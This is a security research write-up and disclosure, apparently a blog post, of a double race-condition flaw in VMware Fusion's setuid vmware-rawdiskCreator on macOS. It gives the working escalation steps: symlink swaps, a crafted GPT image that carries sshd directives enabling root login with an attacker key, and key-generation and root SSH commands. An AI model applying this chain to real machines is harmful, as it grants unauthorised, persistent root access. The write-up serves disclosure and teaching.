C111000: Race Against The Virtual Machine or how a SUID binary in VMware Fusion was raced to gain root privileges on macOS
Introduction
VMware Fusion is one of the most widely deployed virtualization solutions on
macOS. It allows users to run virtual machines, manage virtual disk images, and
interact with raw physical disks. One of its less known components is a
command line utility called vmware-rawdiskCreator, which creates VMDK
(Virtual Machine Disk) descriptors from physical disk devices. What makes this
binary particularly interesting from a security perspective is that it is
installed as SUID (or setuid) root.
During this research, I identified a double TOCTOU (Time of check Time of use) race condition. By exploiting two sequential race windows, an unprivileged user can redirect the binary’s root privileged file creation operations to arbitrary directories on the filesystem.
Combined with a carefully crafted GPT disk image and a creative choice of
target directory, this vulnerability achieves persistent Local Privilege
Escalation as root.
Reserach environment (vulnerable version <= 25H2u1)
Tests were performed on macOS 26.4.1 (25E253). Take this information into consideration if you ever want to reproduce these findings on other macOS versions or VMware Fusion releases.
Quick download and installation
You can download VMware Fusion from VMware website (which redirects to Broadcom website).
After mounting the downloaded .dmg image, all you have to do is click the VMware icon to start the installation.
Then you can launch the tool.
Target identification
During installation, VMware Fusion places several binaries inside its application bundle. Let’s have a look at the ones installed with the setuid bit.
vmware-rawdiskCreator has the setuid bit enabled. The binary is owned by
root (as s bit is set), and starts running with root privileges,
regardless of which user launches it.
The target could easily have been identified using a tool I developed called MTM, which does local attack surface mapping for macOS. It recursively walks the filesystem, identifies Mach-O binaries, captures file metadata and code-signing entitlement.
The binary is a universal (Fat/fat) Mach-O supporting both Intel and Apple Silicon. Let’s look at its usage.
The create command takes a raw disk device (e.g., /dev/diskXX), a partition
number, an output path, and an adapter type. It produces two output files:
- <USER_DEFINED>-pt.vmdk, the partition table extent (raw MBR + GPT data from the disk).
- <USER_DEFINED>.vmdk, the VMDK descriptor (a text file).
These files are created inside a temporary working directory hierarchy that the
binary builds under TMPDIR (if the environment variable is set).
Analysis
The goal of dynamic analysis is to run the binary as expected and observe what
happens from a filesystem perspective. For this purpose, we can use fs_usage.
I’m using a custom patched version of
fs_usage_ng, which is itself a patched version offs_usagefrom Gergely Kalman.
Since we can now see which functions and syscalls are called by the binary, we can begin the first stage of reverse engineering to identify how the paths are constructed, determine whether they can be controlled by the user running the binary or not.
We must therefore reverse the function sub_10001c9e0().
Since it is quite a long function, I will just summarize what it does rather than show you some screenshots.
sub_10001c9e0() starts by taking a process-wide exclusive lock, then calls
_geteuid() and uses that as the security identity for the temp directory. It
keeps two cached paths, selected by the second argument. If a cached path
already exists for the current effective UID, it tries mkdir(path, 0700). If
that fails with EEXIST, it runs lstat() and only accepts the directory if
all of the following conditions are true:
- It is a directory where
st_uid == geteuid(). - Permissions are reduce to
0700.
st.st_uid, user id of the owner returned bylstat().
If there is no usable cached directory, it searches for a base temp directory.
The first argument controls whether it first consults the preference key
tmpDirectory (_Preference_GetString()). After that it tries _getenv("TMPDIR"),
then hardcoded candidates (including /var/tmp/
and /tmp), then the current working directory
via _File_Cwd(), and then one more built-in fallback.
Every candidate is only screened with
_FileIsWritableDir().
Playing with getenv()
As shown, we can control the path of the temporary directory by manipulating
the TMPDIR environment variable. Let’s see what happens with fs_usage when
this variable is under our control.
Binary’s behavior
When invoked using create, the binary performs the following operations
(while running with effective UID 0, root privileges):
mkdirTMPDIR/vmware-root/ (mode0700).mkdirTMPDIR/vmware-root/rawdiskCreator<pid>/ (mode0700).openTMPDIR/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>-pt.vmdk (O_CREAT).writeraw MBR + GPT data from the source disk.openTMPDIR/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>.vmdk (O_CREAT).writeVMDK descriptor text.- On error or completion it
unlinkfiles andrmdirdirectories.
When looking at the execution flow, I realized that several properties of this behavior were relevant to perform a TOCTOU attack.
TMPDIR environment variable is user-controlled
The binary inherits TMPDIR from the calling process and uses it as the base
for its temporary directory hierarchy. On macOS, TMPDIR typically points to
a per user directory under /private/var/folders/,
but an attacker can set it to any path before invoking the binary.
O_NOFOLLOW on source files
While the binary does use O_NOFOLLOW when creating destination files (after
dropping privileges for the final VMDK output), it does not use this flag for
the intermediate source files created in above steps 3 and 5. This means that
if any component of the path is a symlink, the kernel will happily follow it.
The
O_NOFOLLOWflag causes the open to fail if the last component of the path is a symbolic link. Its absence here is the root cause of the vulnerability.
Files are created as root
Because the binary’s effective UID is 0 at the time of file creation, the
resulting files are owned by root with mode 0600. This is a powerful
primitive as we can create root owned files in any directory where root has
write access (with the exception of repertoires protected by SIP).
Cleanup on exit
The binary removes its temporary files and directories before exiting. This
means that after a successful race, we must freeze the binary (via SIGSTOP)
before it can run its cleanup routine, or the planted files will be deleted.
Understanding the TOCTOU vulnerability
The vulnerability is a classic TOCTOU race condition. The binary performs
directory creation and file creation as separate, non-atomic operations.
Between these operations, an attacker can substitute a directory with a
symlink, causing the binary’s subsequent open() calls to follow the symlink
to a location of the attacker’s choosing.
The attack consists of two sequential TOCTOU swaps:
After both swaps succeed, the path that the binary resolves becomes:
The binary creates <USER_DEFINED>-pt.vmdk as
root in what it believes is its private temp directory, but the file actually
lands in /etc/ssh/sshd_config.d/.
Enlarging your race window
TOCTOU races are known for being extremely time sensitive. The interval between the creation of the directory and the creation of the file can be as short as a few microseconds. To ensure I win the race reliably, I used two techniques.
Path-padding symlink chains
Instead of pointing TMPDIR directly at a temporary directory, we create a
chain of 20 symlinks, each stuffed with ./ and
d/../ path components.
tmpdir/s1 -> ././d/../././d/../...s2
tmpdir/s2 -> ././d/../././d/../...s3
...
tmpdir/s20 -> ././d/../././d/../... (resolves to tmpdir itself)
tmpdir/d -> (real directory, needed for "d/../" to resolve)
In XNU, the main pathname resolution function is
namei(struct nameidata *ndp).namei()converts a pathname into the resolved vnode/inode, and its comment shows the lookup flow. Choose the starting directory, then repeatedly call lookup on path components. At a lower-level the resolver islookup(), which is called from insidenamei().
We then set TMPDIR to <tmpdir>/s1. When the
binary resolves this path, the function namei() must traverse thousands of
path components across 20 symlink hops. This wastes tens of microseconds of
CPU time in kernel space, dramatically widening the race window.
This technique is inspired by the path padding approach described by Borisov, Johnson, and Dean in “Fixing Races for Fun and Profit: How to Abuse atime” (USENIX Security 2005). The idea is that forcing the kernel to perform long path resolution slows down the victim process without requiring any special privileges.
It looks very much like USENIX Security 2005, diagram.
The total number of symlink hops must stay within macOS’s MAXSYMLINKS (from
XNU kernel source bsd/sys/param.h) limit.
Our directory structure is as follows:
- 20 (chain) + 1 (vmware-root) + 1 (rawdiskCreator<pid>) = 22 hops
Which fit within the 32 hop limit.
CPU pressure
In addition to path padding, we spawn background threads that perform cache thrashing memory writes. These threads compete with the vulnerable binary for CPU time, causing it to be preempted more frequently and further stretching the duration of the race window.
One pressure thread is spawned per logical CPU. The combination of path padding
and CPU pressure makes the race extremely reliable, during my tests, it
consistently won within 1 to 2 (while loop) attempts on my host and 25 to 28
(while loop) attempts within a VM.
Stage 1: RENAME_SWAP on vmware-root
The first race targets the vmware-root directory.
After the binary creates TMPDIR/vmware-root/
as a real directory, we need to replace it with a symlink to our staging
directory.
We monitor the temp directory using fstatat(), waiting for
vmware-root to appear.
The key operation here is renameatx_np() with the RENAME_SWAP flag. This is
a macOS specific system call that atomically swaps two directory entries. We
precreate a symlink called .swap_sym pointing
to our staging directory, then swap it with vmware-root
in a single atomic operation.
renameatx_np(2)withRENAME_SWAPperforms an atomic exchange of two filesystem entries. This is strictly better than a non-atomicrename+symlinksequence, because it eliminates the brief window where neither entry exists. However, both entries must be on the same filesystem.
If RENAME_SWAP fails (for example, if the temp directory and the swap target
are on different filesystems), we fall back to a non-atomic rename + symlink
sequence.
After the swap succeeds, the binary’s vmware-root entry now points to our staging directory. Any subsequent path resolution through vmware-root lands under our control.
Stage 2: rmdir + symlink on rawdiskCreator<pid>/
After Stage 1, the binary creates rawdiskCreator<pid>/ inside what is now our staging directory. We need to replace this directory with a symlink to the final target /etc/ssh/sshd_config.d/.
The process is similar to Stage 1, but we use rmdir() + symlink() instead
of RENAME_SWAP, because the directory to be replaced is freshly created and
empty.
Before resuming the binary, we set up a kqueue watch on the target directory
using EVFILT_VNODE with NOTE_WRITE. This mechanism allows us to be notified
the instant a new file appears in the target directory.
kqueue(2)is the macOS kernel event notification interface.EVFILT_VNODEwithNOTE_WRITEfires when the contents of a directory change (e.g., a file is created or deleted). This is significantly faster than polling withreaddir(), allowing us to freeze the binary almost immediately after it creates the first file.
When the binary resumes and creates <USER_DEFINED>-pt.vmdk, the full path resolution proceeds as follows:
The kqueue fires, and we immediately SIGSTOP the binary again. This is
critical as the binary creates <USER_DEFINED>-pt.vmdk
first, then <USER_DEFINED>.vmdk. By freezing
it after the first file is created, but before the second, we ensure that only
<USER_DEFINED>-pt.vmdk lands in the target
directory.
Crafting the payload
The planted file <USER_DEFINED>-pt.vmdk contains the raw MBR (Master Boot Record) and GPT (GUID Partition Table) data from the source disk. Since we craft the source disk image ourselves, we have full control over its contents.
MBR boot code
According to the UEFI specification, the first 440 bytes of the MBR are reserved for boot code. On GPT disks, this area is unused which gives us 440 bytes of fully controlled payload at the very beginning of the -pt.vmdk file.
On a GPT disk, the BootCode field in the first sector is not used because UEFI firmware does not execute sector 0. Instead of running raw disk code like BIOS does with MBR, UEFI reads the GPT directly and loads a bootloader from the EFI System Partition.
Building a valid GPT image
We cannot simply dump arbitrary data into a file and pass it to the binary. The
vmware-rawdiskCreator binary validates that the source disk contains a valid
GPT partition table with at least one partition. We must construct a compliant
GPT image.
Our image builder creates a minimal 10Mb disk image with:
- A protective MBR with our payload in the boot code area.
- A primary GPT header (sector 1) with valid checksums.
- A partition entry array (sectors 2-33) containing one Apple HFS+ partition.
- A backup GPT header and entry array at the end of the image.
The partition type GUID is set to Apple HFS/HFS+, which the binary accepts for
partition mode operation. The image is then attached as a virtual disk device
using hdiutil.
Command:
hdiutil attach -nomount payload.img
Output:
/dev/diskXX GUID_partition_scheme
/dev/diskXXs1 Apple_HFS
This /dev/diskXX device is passed to
vmware-rawdiskCreator as the source disk.
Eliminating newline (0x0A) bytes from GPT structures
For reasons that will become clear in the next section, the planted
-pt.vmdk file must be parseable as a valid
sshd configuration file. The configuration format we target uses # to
denote comments. Our strategy is as follow:
- The payload (first 440 bytes) contains valid configuration directives,
and end with
\n#. - The
#at the end of the payload makes everything that follows a comment. - If there are no more
0x0A(newline) bytes in the remaining ~34KB of GPT data, the entire binary content forms a single, very long comment line.
Most GPT fields are naturally free of 0x0A.
The problematic fields are the CRC32 checksums. These are computed over other fields and cannot be directly set to arbitrary values. However, we can influence them indirectly by modifying fields that contribute to the checksum but have no semantic significance to the binary (we can brute-force two GUID fields).
Partition unique GUID (16 bytes)
This is a random identifier for the partition. We iterate through candidate
values, computing the CRC32 of the full 128 entry partition array for each,
until we find one where the resulting CRC contains no 0x0A byte. Each
candidate byte is deterministically derived and clamped away from 0x0A.
Disk GUID (16 bytes)
This identifies the disk itself. We iterate similarly, but this time we must
satisfy two constraints simultaneously. The primary header CRC and the backup
header CRC must both be free of 0x0A. The two headers have different LBA
values (the backup header’s myLBA and alternateLBA are swapped), so their
CRCs differ.
In practice, both searches converge in 1 to 3 attempts. After bruteforcing, a
final scan verifies that zero 0x0A bytes remain anywhere in the GPT
structures.
Finding the right target or why sudoers.d fails and sshd_config.d works
The exploit gives us the ability to create a root owned file in any
directory (excluding those protected by SIP). The planted file is always named
<USER_DEFINED>-pt.vmdk (derived from the
output basename and the -pt.vmdk suffix
hardcoded in the binary). The key question is, “Where should we plant this file
to achieve privilege escalation?”.
sudoers.d dead end
The obvious first target is /etc/sudoers.d/. On macOS, /etc/sudoers includes this directive:
File: /etc/sudoers
...
## Read drop-in files from /private/etc/sudoers.d
## (the '#' here does not indicate a comment)
#includedir /private/etc/sudoers.d
Despite the # prefix, this is not a comment. The #includedir directive
tells sudo to read all configuration files from the specified directory. If we
could plant a file containing %staff ALL=(ALL) NOPASSWD: ALL in
/etc/sudoers.d/, any member of the staff group
(which includes all local users on macOS) would gain passwordless sudo access.
However, sudo applies a filename filter to files read via #includedir.
From the sudoers(5) manual page. When sudoreads the sudoers
file via #includedir, it will skip any files that end in ~ or contain a ..
Our file suffix is -pt.vmdk. It contains .,
so, sudo will unconditionally skip it.
Since the filename is derived from the binary’s internal logic (it appends .vmdk and -pt.vmdk to the output path argument), there is no way to avoid the dots.
I explored several workarounds:
- LaunchDaemons: /Library/LaunchDaemons/
requires
.plistextension.launchctl loadreturns “Input/output error” for .vmdk files. - Periodic scripts:
periodic(8)checks executability. Our file has mode0600(no execute bit), and we cannotchmodit. - PAM: /etc/pam.d/ requires files named after
the service (e.g.,
sudo,login). A file named -pt.vmdk does not match any service. - cron.d: Does not exist by default on macOS.
- paths.d:
path_helperruns as the calling user, which cannot read our0600file. And even when readable, paths.d entries are appended (not prepended) toPATH, preventing command shadowing.
The sshd_config.d breakthrough
After exhausting the obvious targets, I examined how macOS configures OpenSSH. The file /etc/ssh/sshd_config contains:
This is a critical difference from sudo’s #includedir. OpenSSH’s Include
directive uses standard glob(3) pattern matching. The pattern * matches all
non hidden files regardless of their extension or the presence of dots in their
filename. Our -pt.vmdk file matches this glob
and will be included.
The distinction is subtle but critical. sudo’s
#includedirapplies a custom filename filter (rejecting files with.), while OpenSSH’sIncludeuses the system’sglob(3)function, which has no such filter. This difference is what makes sshd_config.d a viable target when sudoers.d is not.
Furthermore, the Include directive appears at the top of
sshd_config, before all other options. Since
OpenSSH uses first match wins semantics, our directives take precedence.
sshd_config uses # for comments, just like
sudoers. Our \n# trick works identically.
sshd runs as root and can read the 0600 file.
I verified that the existing file in the include directory (100-macos.conf) does not conflict with our payload:
None of these options overlap with our payload, as our payload consists of:
PermitRootLogin yes
AuthorizedKeysCommand /bin/cat /tmp/.k
AuthorizedKeysCommandUser root
#
When the binary writes this into the MBR boot code area and the rest of the GPT data follows, the resulting <USER_DEFINED>-pt.vmdk file looks like:
Line 1: PermitRootLogin yes (valid sshd_config directive)
Line 2: AuthorizedKeysCommand /bin/cat /tmp/.k (valid sshd_config directive)
Line 3: AuthorizedKeysCommandUser root (valid sshd_config directive)
Line 4: #<34 KB of binary GPT data> (comment with no newlines to EOF)
Each directive serves a specific purpose:
PermitRootLogin yes, allows SSH login as therootuser.AuthorizedKeysCommand /bin/cat /tmp/.k, tellssshdto execute/bin/cat /tmp/.kto obtain authorized public keys for any connecting user. The/bin/catbinary satisfiessshd’s requirement as the command is owned byrootand not writable by group or others. This approach is additive. It does not overrideAuthorizedKeysFile, so existing SSH authentication for other users remains unaffected.AuthorizedKeysCommandUser root, specifies that the command should run asroot.
The file /tmp/.k need to be created before
running the exploit as it will craft our Ed25519 public key. But first, I
verified that sshd accepts this configuration by running sshd in test mode.
Command:
/usr/sbin/sshd -T -f /tmp/test_main.conf -h /tmp/test_hostkey | grep -E 'permit|authorized'
Output:
permitrootlogin yes
authorizedkeyscommand /bin/cat /tmp/.k
authorizedkeyscommanduser root
All three directives are active, and sshd exits with code 0, confirming that
the binary GPT data after # is correctly treated as a comment.
Exploitation and proof of concept
Prerequisites
The exploit requires SSH (Remote Login) enabled on the target system (or patience for it to be enabled).
Creation of cryptographic keys
Before running, we prepare the SSH keys that will be used for root
authentication:
ssh-keygen -t ed25519 -f /tmp/.kp -N ""
cp /tmp/.kp.pub /tmp/.k
Compiling the exploit
cc -O2 -lpthread -o exploit exploit.c
Running the exploit
File: exploit.c (sha256: 7e56de8b1fb461f4e67559a8d89b7368246156fe0448717da4514aa2183718a9)
/*
* /\ .-----. /\
* //\\/ \//\\
* |/\| 0 |/\|
* //\\\;-----;///\\
* // \/ . \/ \\
* (| ,-_|coiffeur|_-, |)
* //`__\.-.-./__`\\
* // /.-( )-.\ \\
* (\ |) ' ' (| /)
* ` (| |) `
* \) (/
* Title: VMware Fusion TOCTOU LPE as root (macOS)
* Author: Mathieu Farrell aka @Coiffeur0x90
* Summary: Exploits a double TOCTOU race condition in the suid root binary
* vmware-rawdiskCreator to write an attacker controlled, root owned
* file into /etc/ssh/sshd_config.d/. The planted file configures
* sshd to accept root SSH login using a attacker supplied public key,
* achieving persistent local privilege escalation.
...
Gaining root access
Once sshd is running (if Remote Login is enabled, or after the next reboot on
systems where it is enabled), the attacker can SSH in as root:
ssh -i /tmp/.kp root@localhost
The planted configuration causes sshd to run /bin/cat /tmp/.k as the
AuthorizedKeysCommand, which returns the attacker’s public key. SSH public
key authentication succeeds, and the attacker obtains a root shell.
Persistence
The planted file survives reboots. It will be included by sshd on every
startup via the Include /etc/ssh/sshd_config.d/* directive. The attacker
maintains root SSH access as long as the file remains in
/etc/ssh/sshd_config.d/ and the key file exists
at /tmp/.k.
The <USER_DEFINED>.vmdk problem
It is worth mentioning a subtlety in the exploit’s race against the binary’s file creation sequence. The binary creates two files:
- <USER_DEFINED>-pt.vmdk, the partition table (our payload).
- <USER_DEFINED>.vmdk, the VMDK descriptor (a text file with VMware-specific syntax).
If <USER_DEFINED>.vmdk is also created in
/etc/ssh/sshd_config.d/, it will be included by
sshd’s glob and parsed. This file begins with # Disk DescriptorFile (a comment),
but subsequent lines like version=1 are not valid
sshd_config keywords. sshd might treats
unknown keywords as fatal errors and refuses to start.
This is why the kqueue-based freeze mechanism in Stage 2 is critical. By
detecting the first file creation (the NOTE_WRITE event on the target
directory) and immediately sending SIGSTOP, we freeze the binary after
<USER_DEFINED>-pt.vmdk is created but before
<USER_DEFINED>.vmdk is written. In all of my
test runs, only <USER_DEFINED>-pt.vmdk landed in the target directory.
Conclusion
This research demonstrates how a TOCTOU race condition in a setuid binary can
be escalated to full root access on macOS. The key ingredients of this recipe
were:
- A SUID
rootbinary that follows symlinks when creating files in a user-controlled directory hierarchy. - Path-padding symlink chains to widen the race window to a reliably winnable size.
- An atomic directory swap (
RENAME_SWAP) for the first race, and akqueue-triggered freeze for precise timing control. - A crafted GPT disk image with all
0x0Abytes brute forced out of the CRC32 checksums, making the binary partition table data invisible to line oriented config parsers. - The subtle difference between
sudo’s#includedir(which filters filenames containing.) and OpenSSH’sInclude(which uses unrestrictedglob(3)matching), making sshd_config.d a viable target.
Thanks for taking the time to read this article.
Timeline
- 2026 March 31: Discovered the vulnerability in my hotel room after the second day of attending Csaba Fitzl & Gergely Kalman’s training session at Zer0con.
- 2026 April 12: First email sent to security@vmware.com.
- 2026 April 12: Second email sent to vmware.psirt@broadcom.com.
- 2026 April 12: Start of the investigation by VMware team.
- 2026 April 25: Vulnerability confirmed by VMware team.
- 2026 April 25: I Declined to join the private Bung Bounty program and therefore declined to sign the associated NDA.
- 2026 April 29: VMware has informed me that the process now qualifies as a public disclosure and that they will keep me updated on the rest of the process.
- 2026 May 11: VMware has informed me that the advisory will be published.
- 2026 May 14: The advisory has been published as VMSA-2026-0003/CVE-2026-41702.